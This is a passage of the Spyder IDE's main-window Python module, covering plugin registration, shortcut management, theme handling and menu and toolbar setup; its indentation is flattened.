# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import glob
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QMainWindow, QMenu,
QMessageBox, QShortcut, QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) imports of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
qt_message_handler, set_links_color,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
get_safe_mode, is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.utils.image_path_manager import get_image_path
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
from spyder.app.solver import (
find_external_plugins, find_internal_plugins, solve_plugin_dependencies)
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
#==============================================================================
# Install Qt message handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing the plugin's name.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
if error:
raise SpyderAPIError(
'Plugin "{}" not found!'.format(plugin_name))
else:
return None
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.NAME] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.NAME] = plugin
else:
self._INTERNAL_PLUGINS[plugin.NAME] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_plugin_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
shortcut = None
if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Bail out if TABIFY is an empty list or a list whose only value is None
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugins do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make Spyder quit when pressing Ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when Spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Mapping of new plugin identifiers vs old attribute
# names given for plugins, or to prevent collisions with other
# attributes, e.g. layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# Tour
# TODO: Should be a plugin
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# --- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Set css_path config (to change between light and dark css versions
# for the Help and IPython console plugins)
# TODO: There is a circular dependency between help and ipython
if CONF.get('help', 'enable'):
CONF.set('help', 'css_path', css_path)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
# Get ordered list of plugins classes and instantiate them
plugin_deps = solve_plugin_dependencies(list(enabled_plugins.values()))
for plugin_class in plugin_deps:
plugin_name = plugin_class.NAME
# Non-migrated plugins
if plugin_name in [
Plugins.Editor,
Plugins.IPythonConsole,
Plugins.Projects]:
if plugin_name == Plugins.IPythonConsole:
plugin_instance = plugin_class(self, css_path=css_path)
else:
plugin_instance = plugin_class(self)
plugin_instance.register_plugin()
self.add_plugin(plugin_instance)
if plugin_name == Plugins.Projects:
self.project_path = plugin_instance.get_pythonpath(
at_start=True)
else:
self.preferences.register_plugin_preferences(
plugin_instance)
# Migrated or new plugins
elif plugin_name in [
Plugins.MainMenu,
Plugins.OnlineHelp,
Plugins.Toolbar,
Plugins.Preferences,
Plugins.Appearance,
Plugins.Run,
Plugins.Shortcuts,
Plugins.StatusBar,
Plugins.Completions,
Plugins.OutlineExplorer,
Plugins.Console,
Plugins.MainInterpreter,
Plugins.Breakpoints,
Plugins.History,
Plugins.Profiler,
Plugins.Explorer,
Plugins.Help,
Plugins.Plots,
Plugins.VariableExplorer,
Plugins.Application,
Plugins.Find,
Plugins.Pylint,
Plugins.WorkingDirectory,
Plugins.Layout]:
plugin_instance = plugin_class(self, configuration=CONF)
self.register_plugin(plugin_instance)
# TODO: Check thirdparty attribute usage
# For now append plugins to the thirdparty attribute as was
# being done
if plugin_name in [
Plugins.Breakpoints,
Plugins.Profiler,
Plugins.Pylint]:
self.thirdparty_plugins.append(plugin_instance)
# Load external_plugins adding their dependencies
elif (issubclass(plugin_class, SpyderPluginV2) and
plugin_class.NAME in external_plugins):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.api.widgets.menus import SpyderMenu
from spyder.plugins.mainmenu.api import (
ApplicationMenus, HelpMenuSections, ToolsMenuSections,
FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
self.consoles_menu = mainmenu.get_application_menu("consoles_menu")
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
self.projects_menu = mainmenu.get_application_menu("projects_menu")
self.projects_menu.aboutToShow.connect(self.valid_project)
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
from spyder.plugins.application.plugin import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = self.application.get_action(
ApplicationActions.SpyderWindowsEnvVariables)
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action
)
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
mainmenu.add_item_to_application_menu(
self.menu_lsp_logs,
menu_id=ApplicationMenus.Tools)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
#----- Tours
# TODO: Move tours to a plugin structure
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self,
self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
mainmenu.add_item_to_application_menu(
self.tour_action,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.Documentation)
# TODO: Move to plugin
# IPython documentation
if self.help is not None:
self.ipython_menu = SpyderMenu(
parent=self,
title=_("IPython documentation"))
intro_action = create_action(
self,
_("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(
self,
_("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(
self,
_("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(
self.ipython_menu,
(intro_action, guiref_action, quickref_action))
mainmenu.add_item_to_application_menu(
self.ipython_menu,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.ExternalDocumentation,
before_section=HelpMenuSections.About)
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
